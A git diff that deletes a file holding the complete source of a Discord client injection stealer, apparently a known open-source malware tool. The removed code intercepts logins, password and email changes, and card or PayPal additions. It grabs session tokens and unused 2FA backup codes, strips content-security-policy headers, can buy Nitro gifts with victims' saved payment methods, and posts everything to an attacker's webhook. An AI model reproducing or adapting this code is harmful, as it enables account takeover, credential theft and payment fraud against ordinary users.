diff --git a/hazardinject.js b/hazardinject.js deleted file mode 100644 index fac2547..0000000 --- a/hazardinject.js +++ /dev/null @@ -1,582 +0,0 @@ -const args = process.argv; -const fs = require('fs'); -const path = require('path'); -const querystring = require('querystring'); -const { BrowserWindow, session } = require('electron') - -const config = { - auto_buy_nitro: false, - ping_on_run: false, - ping_val: '@everyone', - embed_name: 'Discord Injection', //name of the webhook thats gonna send the info - embed_icon: 'https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png'.replace(/ /g,'%20'), //icon for the webhook thats gonna send the info (yes you can have spaces in the url) - embed_color: 8363488, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it) - webhook: '%WEBHOOK%', //your discord webhook there obviously - /* DON'T TOUCH UNDER HERE IF UNLESS YOU'RE MODIFYING THE INJECTION OR KNOW WHAT YOU'RE DOING */ - api: 'https://discord.com/api/v9/users/@me', - bin: 'https://dpaste.com/api/', - nitro: { - boost: { - year: { - id: "521847234246082599", - sku: "511651885459963904", - price: "9999", - }, - month: { - id: "521847234246082599", - sku: "511651880837840896", - price: "999", - }, - }, - classic: { - month: { - id: "521846918637420545", - sku: "511651871736201216", - price: "499", - }, - }, - }, - filter: { - urls: [ - 'https://discord.com/api/v*/users/@me', - 'https://discordapp.com/api/v*/users/@me', - 'https://*.discord.com/api/v*/users/@me', - 'https://discordapp.com/api/v*/auth/login', - 'https://discord.com/api/v*/auth/login', - 'https://*.discord.com/api/v*/auth/login', - 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts', - 'https://api.stripe.com/v*/tokens', - ] - }, - filter2: { - urls: [ - 'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json', - 'https://*.discord.com/api/v*/applications/detectable', - 'https://discord.com/api/v*/applications/detectable', - 'https://*.discord.com/api/v*/users/@me/library', - 'https://discord.com/api/v*/users/@me/library', - 'https://*.discord.com/api/v*/users/@me/billing/subscriptions', - 'https://discord.com/api/v*/users/@me/billing/subscriptions', - 'wss://remote-auth-gateway.discord.gg/*', - ] - } -} - -const discordPath = (function() { - const useRelease = args[2] && args[2].toLowerCase() === "release"; - const releaseInput = useRelease ? args[3] && args[3].toLowerCase() : args[2] && args[2].toLowerCase(); - const release = releaseInput === "canary" ? "Discord Canary" : releaseInput === "ptb" ? "Discord PTB" : "Discord"; - let resourcePath = ""; - if (process.platform === "win32") { - const basedir = path.join(process.env.LOCALAPPDATA, release.replace(/ /g, "")); - const version = fs.readdirSync(basedir).filter(f => fs.lstatSync(path.join(basedir, f)).isDirectory() && f.split(".").length > 1).sort().reverse()[0]; - resourcePath = path.join(basedir, version, "resources"); - } - else if (process.platform === "darwin") { - const appPath = releaseInput === "canary" ? path.join("/Applications", "Discord Canary.app") - : releaseInput === "ptb" ? path.join("/Applications", "Discord PTB.app") - : useRelease && args[3] ? args[3] ? args[2] : args[2] - : path.join("/Applications", "Discord.app"); - - resourcePath = path.join(appPath, "Contents", "Resources"); - } - - if (fs.existsSync(resourcePath)) return resourcePath; - return ""; -})(); - -function updateCheck() { - const appPath = path.join(discordPath, "app"); - const packageJson = path.join(appPath, "package.json"); - const resourceIndex = path.join(appPath, "index.js"); - if (!fs.existsSync(appPath)) fs.mkdirSync(appPath); - if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson, (err) => {}); - if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex, (err) => {}); - - - if (!fs.existsSync(path.join(__dirname, 'initiation'))) return !0; - fs.rmdirSync(path.join(__dirname, 'initiation')); - execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`) - return !1; -} - -const execScript = async(script) => { - const window = BrowserWindow.getAllWindows()[0]; - return await window.webContents.executeJavaScript(script, !0) -}; - -const dpaste = async(content) => { - const raw = await execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("POST", "${config.bin}", false); - xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); - xmlHttp.send('content=${encodeURIComponent(content)}&expiry_days=30'); - xmlHttp.responseText;`) - return raw+'.txt' -}; - -const getInfo = async(token) => { - const info = await execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("GET", "${config.api}", false); - xmlHttp.setRequestHeader("Authorization", "${token}"); - xmlHttp.send(null); - xmlHttp.responseText;`) - return JSON.parse(info) -}; - -const getMfa = async(password, token) => { - if (!token.startsWith('.mfa')) return 'N/A'; - let content = ""; - const mfa = await execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("POST", "${config.api}/mfa/codes", false); - xmlHttp.setRequestHeader('Content-Type', 'application/json'); - xmlHttp.setRequestHeader("authorization", "${token}"); - xmlHttp.send(JSON.stringify({\"password\":\"${password}\",\"regenerate\":false})); - xmlHttp.responseText - `) - const json = JSON.parse(mfa) - let codes = json.backup_codes - const r = codes.filter((code) => { - return code.consumed === null - }) - for (let i in r) { - content += `${r[i].code.insert(4, "-")}\n` - } - const paste = await dpaste(content); - return `[click me!](${paste})` -}; - -const fetchBilling = async(token) => { - const bill = await execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("GET", "${config.api}/billing/payment-sources", false); - xmlHttp.setRequestHeader("Authorization", "${token}"); - xmlHttp.send(null); - xmlHttp.responseText`) - if (bill && !bill.length) { - return ""; - } - return JSON.parse(JSON.parse(bill)) -}; -const getBilling = async (token) => { - const data = await fetchBilling(token) - if (data === "") return "❌"; - let billing = ""; - data.forEach(x => { - if (x.type === 2 && !x.invalid) { - billing += "✔️" + " <:paypal:951139189389410365>"; - } else if (x.type === 1 && !x.invalid) { - billing += "✔️" + " 💳"; - } else { - billing = "❌"; - }; - }); - if (billing === "") billing = "❌" - return billing; -}; - -const Purchase = async (token, id, _type, _time) => { - const req = execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("POST", "${config.api}/store/skus/${config.nitro[_type][_time]['id']}/purchase", false); - xmlHttp.setRequestHeader("Authorization", "${token}"); - xmlHttp.send(${JSON.stringify( - { - "gift": true, - "sku_subscription_plan_id": config.nitro[_type][_time]['sku'], - "payment_source_id": id, - "payment_source_token": 'None', - "expected_amount": config.nitro[_type][_time]['price'], - "expected_currency": "usd", - "purchase_token": "500fb34b-671a-4614-a72e-9d13becc2e95" - } - )}); - xmlHttp.responseText`) - if (req['gift_code']) { - return 'https://discord.gift/'+req['gift_code']; - } else return null; -}; - -const buyNitro = async (token) => { - if (!config.auto_buy_nitro) return 'Auto Buy Nitro disabled'; - const data = await fetchBilling(token); - const valid = [] - data.forEach(x => { - if (x.type === 2 && !x.invalid) { - valid.push(x.id) - } else if (x.type === 1 && !x.invalid) { - valid.push(x.id) - } - }); - for (let id in valid) { - const first = Purchase(token, id, 'boost', 'year') - if (first !== null) { - return first; - } else { - const second = Purchase(token, id, 'boost', 'month') - if (second !== null) { - return second; - } else { - const third = Purchase(token, id, 'classic', 'month') - if (third !== null) { - return third; - } else { - return 'Failed to Purchase Gift' - } - } - } - }; -}; - -const getNitro = (flags) => { - switch (flags) { - case 0: - return "No Nitro"; - case 1: - return "Nitro Classic"; - case 2: - return "Nitro Boost"; - default: - return "No Nitro"; - }; -}; - -const getBadges = (flags) => { - let badges = ""; - switch (flags) { - case 1: - badges += "Discord Staff, " - break; - case 2: - badges += "Partnered Server Owner, " - break; - case 131072: - badges += "Discord Developer, " - break; - case 4: - badges += "Hypesquad Event, " - break; - case 16384: - badges += "Gold BugHunter, " - break; - case 8: - badges += "Green BugHunter, " - break; - case 512: - badges += "Early Supporter, " - break; - case 128: - badges += "HypeSquad Brillance, " - break; - case 64: - badges += "HypeSquad Brillance, " - break; - case 256: - badges += "HypeSquad Balance, " - break; - case 0: - badges = "None" - break; - default: - badges = "None" - break; - } - return badges -} -const hooker = (content) => { - execScript(`var xmlHttp = new XMLHttpRequest(); - xmlHttp.open("POST", "${config.webhook}", true); - xmlHttp.setRequestHeader('Content-Type', 'application/json'); - xmlHttp.setRequestHeader('Access-Control-Allow-Origin', '*'); - xmlHttp.send(JSON.stringify(${JSON.stringify(content)})); -`) -} -const login = async (email, password, token) => { - const json = await getInfo(token); - const nitro = getNitro(json.premium_type); - const badges = getBadges(json.flags) - const billing = await getBilling(token) - const mfa = await getMfa(password, token); - const content = { - username: config.embed_name, - avatar_url: config.embed_icon, - embeds: [ - { - "color": config.embed_color, - "fields": [ - { - "name": "**Account Info**", - "value": `Email: **${email}** - Password: **${password}**`, - "inline": false - }, - { - "name": "**Other Info**", - "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, - "inline": false - }, - { - "name": "**Token**", - "value": `\`${token}\``, - "inline": false - } - ], - "author": { - "name": json.username +"#" + json.discriminator + "・" + json.id, - "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` - }, - "footer": { - "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" - } - } - ] - } - if (config.ping_on_run) content['content'] = config.ping_val; - hooker(content) -} -const passwordChanged = async (oldpassword, newpassword, token) => { - const json = await getInfo(token); - const nitro = getNitro(json.premium_type); - const badges = getBadges(json.flags) - const billing = await getBilling(token) - const mfa = await getMfa(newpassword, token) - const content = { - username: config.embed_name, - avatar_url: config.embed_icon, - embeds: [ - { - "color": config.embed_color, - "fields": [ - { - "name": "**Password Changed**", - "value": `Email: **${json.email}**\nOld Password: **${oldpassword}**\nNew Password: **${newpassword}**`, - "inline": true - }, - { - "name": "**Other Info**", - "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, - "inline": true - }, - { - "name": "**Token**", - "value": `\`${token}\``, - "inline": false - } - ], - "author": { - "name": json.username +"#" + json.discriminator + "・" + json.id, - "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` - }, - "footer": { - "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" - } - } - ] - } - if (config.ping_on_run) content['content'] = config.ping_val; - hooker(content) -} -const emailChanged = async (email, password, token) => { - const json = await getInfo(token); - const nitro = getNitro(json.premium_type); - const badges = getBadges(json.flags) - const billing = await getBilling(token) - const mfa = await getMfa(password, token) - const content = { - username: config.embed_name, - avatar_url: config.embed_icon, - embeds: [ - { - "color": config.embed_color, - "fields": [ - { - "name": "**Email Changed**", - "value": `New Email: **${email}**\nPassword: **${password}**`, - "inline": true - }, - { - "name": "**Other Info**", - "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**\n2fa Codes: **${mfa}**`, - "inline": true - }, - { - "name": "**Token**", - "value": `\`${token}\``, - "inline": false - } - ], - "author": { - "name": json.username +"#" + json.discriminator + "・" + json.id, - "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` - }, - "footer": { - "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" - } - } - ] - } - if (config.ping_on_run) content['content'] = config.ping_val; - hooker(content) -} - -const PaypalAdded = async (token) => { - const json = await getInfo(token); - const nitro = getNitro(json.premium_type); - const badges = getBadges(json.flags) - const billing = getBilling(token) - const code = await buyNitro(token) - const content = { - username: config.embed_name, - avatar_url: config.embed_icon, - embeds: [ - { - "color": config.embed_color, - "fields": [ - { - "name": "**Paypal Added**", - "value": `Nitro code: \`${code}\``, - "inline": false - }, - { - "name": "**Other Info**", - "value": `Nitro Type: **${nitro}*\nBadges: **${badges}**\nBilling: **${billing}**`, - "inline": false - }, - { - "name": "**Token**", - "value": `\`${token}\``, - "inline": false - } - ], - "author": { - "name": json.username +"#" + json.discriminator + "・" + json.id, - "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` - }, - "footer": { - "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" - } - } - ] - } - if (config.ping_on_run) content['content'] = config.ping_val; - hooker(content) -} -const ccAdded = async (number, cvc, expir_month, expir_year, token) => { - const json = await getInfo(token); - const nitro = getNitro(json.premium_type); - const badges = getBadges(json.flags) - const billing = await getBilling(token) - const code = await buyNitro(token) - const content = { - username: config.embed_name, - avatar_url: config.embed_icon, - embeds: [ - { - "color": config.embed_color, - "fields": [ - { - "name": "**Credit Card Added**", - "value": `Credit Card Number: ${number}\nCVC: ${cvc}\nCredit Card Expiration: ${expir_month}/${expir_year}`, - "inline": true - }, - { - "name": "**Other Info**", - "value": `Nitro Type: **${nitro}**\nBadges: **${badges}**\nBilling: **${billing}**`, - "inline": true - }, - { - "name": "**Nitro Code**", - "value": `\`${code}\``, - "inline": false - }, - { - "name": "**Token**", - "value": `\`${token}\``, - "inline": false - } - ], - "author": { - "name": json.username +"#" + json.discriminator + "・" + json.id, - "icon_url": `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}.webp` - }, - "footer": { - "text": "Discord Injection By github.com/Rdimo・https://github.com/Rdimo/Discord-Injection" - } - } - ] - } - if (config.ping_on_run) content['content'] = config.ping_val; - hooker(content) -} - -session.defaultSession.webRequest.onBeforeRequest(config.filter2, (details, callback) => { - if (details.url.startsWith("wss://")) { - callback({ - cancel: true - }) - return; - } - if (updateCheck()) {} - - callback({}) - return; -}) - -session.defaultSession.webRequest.onHeadersReceived((details, callback) => { - if (details.url.startsWith(config.webhook)) { - if (details.url.includes("discord.com")) { - callback({ - responseHeaders: Object.assign({ - 'Access-Control-Allow-Headers': "*" - }, details.responseHeaders) - }); - } else { - callback({ - responseHeaders: Object.assign({ - "Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"], - 'Access-Control-Allow-Headers': "*", - "Access-Control-Allow-Origin": "*" - }, details.responseHeaders) - }); - } - } else { - delete details.responseHeaders['content-security-policy']; - delete details.responseHeaders['content-security-policy-report-only']; - - callback({ - responseHeaders: { - ...details.responseHeaders, - 'Access-Control-Allow-Headers': "*" - } - }) - } -}) - -session.defaultSession.webRequest.onCompleted(config.filter, async (details, _) => { - const unparsedData = details.uploadData[0].bytes - const data = JSON.parse(Buffer.from(unparsedData).toString()) - const token = await execScript(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`) - - switch (true) { - case details.url.endsWith('login'): - login(data.login, data.password, token) - break; - - case details.url.endsWith('users/@me') && details.method === 'PATCH' && data.password: - if (data.email) { - emailChanged(data.email, data.password, token) - }; - if (data.new_password) { - passwordChanged(data.password, data.new_password, token) - } - break; - - case details.url.endsWith('tokens') && details.method === "POST": - const item = querystring.parse(unparsedData.toString()) - ccAdded(item["card[number]"], item["card[cvc]"], item["card[exp_month]"], item["card[exp_year]"], token) - break; - - case details.url.endsWith('paypal_accounts') && details.method === "POST": - PaypalAdded(token) - break; - default: - break; - } -}); -module.exports = require('./core.asar') \ No newline at end of file